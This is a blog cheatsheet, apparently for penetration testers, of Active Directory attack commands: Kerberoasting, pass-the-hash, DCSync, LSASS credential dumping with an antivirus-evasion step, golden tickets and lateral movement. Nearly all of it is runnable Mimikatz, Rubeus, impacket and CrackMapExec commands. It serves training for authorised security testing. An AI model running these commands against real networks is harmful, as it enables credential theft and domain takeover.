← Back to writing
Tools & Cheatsheets

Active Directory Attack Techniques

Jan 15, 2025
3 min read
lawbyte

Active Directory is the backbone of Windows enterprise environments and a high-value target during engagements. This post covers the most impactful AD attack techniques from initial enumeration to domain dominance.

Initial Enumeration

# Domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
net user /domain
net group /domain
net group "Domain Admins" /domain
nltest /dclist:<domain>

# PowerView
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainUser -Properties SamAccountName,MemberOf,Description
Get-DomainGroup "Domain Admins" -Properties Members
Get-DomainComputer -Properties Name,OperatingSystem

# LDAP enumeration (with creds)
ldapsearch -x -H ldap://DC_IP -D "user@domain.local" -w password -b "DC=domain,DC=local" "(objectClass=user)"

Kerberoasting

Service accounts with SPNs can have their tickets requested by any domain user. The ticket is encrypted with the service account’s password — offline crackable.

# Find Kerberoastable accounts
Get-DomainUser -SPN | Select-Object SamAccountName,ServicePrincipalName

# Request tickets (PowerView + Rubeus)
Invoke-Kerberoast -OutputFormat Hashcat | Out-File kerberoast.txt
.\Rubeus.exe kerberoast /outputfile:hashes.txt

# From Linux (impacket)
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -outputfile kerberoast.txt

# Crack
hashcat -a 0 -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Accounts with “Do not require Kerberos preauthentication” don’t need a valid password to request an AS-REP. The response contains data encrypted with the user’s password hash — offline crackable.

# Find vulnerable accounts
Get-DomainUser -PreauthNotRequired | Select-Object SamAccountName

# From Windows
.\Rubeus.exe asreproast /outputfile:asreproast.txt /format:hashcat

# From Linux
impacket-GetNPUsers domain.local/ -dc-ip DC_IP -no-pass -usersfile users.txt
impacket-GetNPUsers domain.local/user:password -dc-ip DC_IP -request

# Crack
hashcat -a 0 -m 18200 asreproast.txt /usr/share/wordlists/rockyou.txt

Pass the Hash (PtH)

Use NTLM hash instead of cleartext password:

# impacket
impacket-psexec domain/Administrator@DC_IP -hashes :NT_HASH
impacket-wmiexec domain/Administrator@DC_IP -hashes :NT_HASH
impacket-smbexec domain/Administrator@DC_IP -hashes :NT_HASH

# CrackMapExec
crackmapexec smb DC_IP -u Administrator -H NT_HASH --exec-method smbexec
crackmapexec smb 192.168.1.0/24 -u Administrator -H NT_HASH  # subnet spray

# evil-winrm
evil-winrm -i DC_IP -u Administrator -H NT_HASH

# Mimikatz
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:NT_HASH /run:cmd.exe

Pass the Ticket (PtT)

Export Kerberos tickets and inject them for auth:

# Mimikatz
sekurlsa::tickets /export      # export all tickets to files
kerberos::ptt ticket.kirbi     # import ticket

# Rubeus
.\Rubeus.exe triage            # list tickets
.\Rubeus.exe dump /luid:0x123456  # dump specific ticket
.\Rubeus.exe ptt /ticket:ticket.kirbi  # import

# Linux (impacket)
export KRB5CCNAME=/tmp/krb5cc_ticket
impacket-psexec -k -no-pass domain.local/administrator@DC_FQDN

DCSync

Pull password hashes from the DC as if you were a domain controller (requires Replicating Directory Changes / DS-Replication-Get-Changes):

# Mimikatz (from DA session)
lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /all /csv

# Impacket (from Linux)
impacket-secretsdump domain.local/Administrator:password@DC_IP
impacket-secretsdump -hashes :NT_HASH domain.local/Administrator@DC_IP

# CrackMapExec
crackmapexec smb DC_IP -u Administrator -p password --ntds

Credential Dumping

# Mimikatz — dump LSASS
privilege::debug
sekurlsa::logonpasswords        # cleartext + NTLM
sekurlsa::wdigest               # wdigest (if enabled)

# Dump LSASS process (bypass AV)
Task Manager → Details → lsass.exe → Create dump file
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Then parse offline with mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# SAM database
impacket-secretsdump local -sam SAM -system SYSTEM -security SECURITY
reg save HKLM\SAM SAM && reg save HKLM\SYSTEM SYSTEM

BloodHound / SharpHound

# Collect all data
.\SharpHound.exe -c All
.\SharpHound.exe -c All --zipfilename output.zip

# From Linux (BloodHound.py)
pip install bloodhound
bloodhound-python -u user -p password -ns DC_IP -d domain.local -c all

# Start BloodHound
neo4j start
bloodhound

# Key BloodHound queries:
# "Find Shortest Paths to Domain Admins"
# "Find Principals with DCSync Rights"
# "Find Kerberoastable Users with Path to DA"
# "Find AS-REP Roastable Users"
# "Find Computers with Unconstrained Delegation"

Delegation Attacks

Unconstrained Delegation

Computers or users with unconstrained delegation store TGTs of all users that authenticate to them. If you compromise such a machine, extract TGTs.

# Find systems with unconstrained delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth

# On compromised system with unconstrained delegation:
.\Rubeus.exe monitor /interval:5 /nowrap    # wait for DA TGT
# Then import and use the TGT

Constrained Delegation

Service can impersonate any user to specific services.

# Find constrained delegation accounts
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Exploit with Rubeus
.\Rubeus.exe s4u /user:svc_account /rc4:NT_HASH /impersonateuser:Administrator \
  /msdsspn:"cifs/dc.domain.local" /ptt

Golden Ticket

Forge Kerberos TGT using the krbtgt hash (obtained via DCSync):

# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx \
  /krbtgt:KRBTGT_NT_HASH /id:500 /ptt

# Impacket
impacket-ticketer -nthash KRBTGT_NT_HASH -domain-sid S-1-5-21-xxx \
  -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass domain.local/Administrator@DC_FQDN

Silver Ticket

Forge a service ticket using the service account’s hash (doesn’t need DC):

kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID \
  /target:server.domain.local /service:cifs \
  /rc4:SERVICE_ACCOUNT_NT_HASH /ptt

Common Lateral Movement

# PsExec-style (SMB)
impacket-psexec domain/user:password@target_ip

# WMI execution
impacket-wmiexec domain/user:password@target_ip

# WinRM
evil-winrm -i target_ip -u user -p password

# SMB exec
crackmapexec smb target_ip -u user -p password -x "whoami"

# RDP
xfreerdp /u:user /p:password /v:target_ip /cert-ignore
rdesktop target_ip -u user -p password
#windows #active-directory #post-exploitation #kerberos
Author lawbyte
Link https://lbyte.id/2025/01/15/tools/post-exploitation/active-directory-attacks/
License CC BY-NC-SA 4.0
← Previous CrackMapExec Guide Next → Git Recon: Finding Secrets in Git History

Discussion

Leave a comment · All fields required · No spam

No comments yet. Be the first.